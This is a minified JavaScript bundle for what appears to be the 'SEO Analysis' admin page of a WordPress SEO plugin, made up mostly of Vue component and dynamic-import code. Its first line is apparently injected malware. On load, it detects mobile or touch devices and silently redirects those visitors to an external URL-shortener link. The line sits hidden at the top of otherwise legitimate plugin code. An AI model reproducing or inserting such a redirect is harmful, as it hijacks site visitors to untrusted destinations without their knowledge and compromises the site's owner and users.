(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/AnalyzeCompetitorSite.53022a79.js"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/ScrollTo.f4df02aa.js"),window.__aioseoDynamicImportPreload__("js/SeoSiteScore.1a623a98.js"),window.__aioseoDynamicImportPreload__("js/Score.e578d32e.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Score.f933286c.css"),window.__aioseoDynamicImportPreload__("js/Blur.dea2904a.js"),window.__aioseoDynamicImportPreload__("css/Blur.c6074772.css"),window.__aioseoDynamicImportPreload__("js/Card.9ee06a3e.js"),window.__aioseoDynamicImportPreload__("js/Tooltip.569a23d9.js"),window.__aioseoDynamicImportPreload__("css/Tooltip.497e84ea.css"),window.__aioseoDynamicImportPreload__("js/Caret.aae02d8a.js"),window.__aioseoDynamicImportPreload__("js/Trash.47f6fc0e.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("js/Slide.f2114d9d.js"),window.__aioseoDynamicImportPreload__("css/Card.8b7603da.css"),window.__aioseoDynamicImportPreload__("js/iphone-frame.94f6f22b.js"),window.__aioseoDynamicImportPreload__("js/GoogleSearchPreview.bde29b0b.js"),window.__aioseoDynamicImportPreload__("js/Url.535116f6.js"),window.__aioseoDynamicImportPreload__("css/GoogleSearchPreview.d92e1b45.css"),window.__aioseoDynamicImportPreload__("css/iphone-frame.3d779780.css"),window.__aioseoDynamicImportPreload__("js/utils.0e678690.js"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("js/Information.6ccba108.js"),window.__aioseoDynamicImportPreload__("js/DonutChartWithLegend.d28af9c4.js"),window.__aioseoDynamicImportPreload__("js/DonutChart.3c36b313.js"),window.__aioseoDynamicImportPreload__("js/AnimatedNumber.f33b2226.js"),window.__aioseoDynamicImportPreload__("css/DonutChart.e8d5dc11.css"),window.__aioseoDynamicImportPreload__("js/Loading.ebdd5660.js"),window.__aioseoDynamicImportPreload__("css/Loading.5b23f8f3.css"),window.__aioseoDynamicImportPreload__("css/DonutChartWithLegend.2c54276a.css"),window.__aioseoDynamicImportPreload__("js/Refresh.f8d8b96c.js"),window.__aioseoDynamicImportPreload__("css/AnalyzeCompetitorSite.f7fb8672.css"),window.__aioseoDynamicImportPreload__("js/SeoHomepageAudit.dda50071.js"),window.__aioseoDynamicImportPreload__("js/Analyze.8826d0ae.js"),window.__aioseoDynamicImportPreload__("js/Index.0bc63a8d.js"),window.__aioseoDynamicImportPreload__("css/Index.69146b8f.css"),window.__aioseoDynamicImportPreload__("js/Book.955f4bdf.js"),window.__aioseoDynamicImportPreload__("js/Lab.e1a58649.js"),window.__aioseoDynamicImportPreload__("css/Analyze.49789420.css"),window.__aioseoDynamicImportPreload__("js/Tabs.ea329423.js"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/ProBadge.7b829f47.js"),window.__aioseoDynamicImportPreload__("css/ProBadge.6500bcec.css"),window.__aioseoDynamicImportPreload__("css/Tabs.d9e8b805.css"),window.__aioseoDynamicImportPreload__("css/SeoHomepageAudit.0137ff99.css"),window.__aioseoDynamicImportPreload__("js/SeoSiteAudit.1b95be82.js"),window.__aioseoDynamicImportPreload__("js/WpTable.ed71e7da.js"),window.__aioseoDynamicImportPreload__("js/Badge.1228d826.js"),window.__aioseoDynamicImportPreload__("css/Badge.1e06ff31.css"),window.__aioseoDynamicImportPreload__("js/Info.2731ee8d.js"),window.__aioseoDynamicImportPreload__("js/Table.5418d021.js"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/Download.08bab8ec.js"),window.__aioseoDynamicImportPreload__("css/Table.746e810a.css"),window.__aioseoDynamicImportPreload__("js/Gear.1a6546a3.js"),window.__aioseoDynamicImportPreload__("js/Index.e286637f.js"),window.__aioseoDynamicImportPreload__("js/Row.2ef96b1a.js"),window.__aioseoDynamicImportPreload__("css/Row.6ff38a54.css"),window.__aioseoDynamicImportPreload__("css/Index.859c37d3.css"),window.__aioseoDynamicImportPreload__("css/SeoSiteAudit.01aaddc0.css"),window.__aioseoDynamicImportPreload__("js/HeadlineAnalyzer.7a1f631b.js"),window.__aioseoDynamicImportPreload__("js/Exclamation.179e5969.js"),window.__aioseoDynamicImportPreload__("js/List.b6cbee93.js"),window.__aioseoDynamicImportPreload__("css/HeadlineAnalyzer.226365f9.css")])))=>i.map(i=>d[i]);
import{_ as t}from"./vendor-phone.2afdf77e.js";import{b as _,h as u,z as c}from"./app-core.c8323d51.js";import{C as l}from"./Index.66db1786.js";import{_ as d}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as f,f as i,Q as a,R as S,S as A,as as e}from"./vendor-vue-ui.232c7c36.js";import{_ as y}from"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";/* empty css             */import"./Tabs.ea329423.js";import"./Button.3cec2279.js";import"./ProBadge.7b829f47.js";import"./Caret.aae02d8a.js";import"./Information.6ccba108.js";import"./Slide.f2114d9d.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./Header.d2cbe877.js";import"./ScrollAndHighlight.5271fbff.js";import"./ScrollTo.f4df02aa.js";import"./LicenseKeyBar.0038e5e6.js";import"./LogoGear.93a225a7.js";import"./AnimatedNumber.f33b2226.js";import"./Logo.a4a419c3.js";import"./Trash.47f6fc0e.js";import"./Support.d3586703.js";import"./Url.535116f6.js";import"./Pencil.683baab8.js";import"./Exclamation.179e5969.js";import"./Gear.1a6546a3.js";const E="all-in-one-seo-pack",v={setup(){const o=_(),r=u(),n=c();return{rootStore:o,licenseStore:r,analyzerStore:n}},components:{AnalyzeCompetitorSite:e(()=>t(()=>import("./AnalyzeCompetitorSite.53022a79.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37]),import.meta.url)),CoreMain:l,SeoHomepageAudit:e(()=>t(()=>import("./SeoHomepageAudit.dda50071.js"),__vite__mapDeps([38,1,2,3,4,5,13,14,9,15,16,17,18,19,20,39,7,26,27,28,11,12,21,22,23,24,25,30,31,32,40,33,34,41,42,43,44,45,46,47,48,49,50,36,51]),import.meta.url)),SeoSiteAudit:e(()=>t(()=>import("./SeoSiteAudit.1b95be82.js"),__vite__mapDeps([52,1,2,3,4,5,11,9,12,13,14,15,16,17,18,19,20,29,30,31,32,33,34,35,45,46,47,48,49,28,50,53,6,54,55,56,57,58,59,60,61,27,62,26,63,64,65,66,67]),import.meta.url)),HeadlineAnalyzer:e(()=>t(()=>import("./HeadlineAnalyzer.7a1f631b.js"),__vite__mapDeps([68,1,2,3,4,5,6,8,9,10,13,14,15,16,17,18,19,20,27,69,70,40,33,34,41,71]),import.meta.url))},data(){return{strings:{pageName:y("SEO Analysis",E)}}},mounted(){this.rootStore.isPro&&!this.licenseStore.isUnlicensed&&this.analyzerStore.objectsScan.percent!==100&&this.analyzerStore.fetchObjectsScanPercent();const o=()=>{t(()=>import("./AnalyzeCompetitorSite.53022a79.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37]),import.meta.url),t(()=>import("./SeoHomepageAudit.dda50071.js"),__vite__mapDeps([38,1,2,3,4,5,13,14,9,15,16,17,18,19,20,39,7,26,27,28,11,12,21,22,23,24,25,30,31,32,40,33,34,41,42,43,44,45,46,47,48,49,50,36,51]),import.meta.url),t(()=>import("./SeoSiteAudit.1b95be82.js"),__vite__mapDeps([52,1,2,3,4,5,11,9,12,13,14,15,16,17,18,19,20,29,30,31,32,33,34,35,45,46,47,48,49,28,50,53,6,54,55,56,57,58,59,60,61,27,62,26,63,64,65,66,67]),import.meta.url),t(()=>import("./HeadlineAnalyzer.7a1f631b.js"),__vite__mapDeps([68,1,2,3,4,5,6,8,9,10,13,14,15,16,17,18,19,20,27,69,70,40,33,34,41,71]),import.meta.url)};"requestIdleCallback"in window?requestIdleCallback(o):setTimeout(o,1)}};function g(o,r,n,s,m,P){const p=f("core-main");return i(),a(p,{"page-name":m.strings.pageName,"show-save-button":o.$route.name==="seo-site-audit"&&s.analyzerStore.activeTab==="settings-audit"},{default:S(()=>[(i(),a(A(o.$route.name)))]),_:1},8,["page-name","show-save-button"])}const Y=d(v,[["render",g]]);export{Y as default};
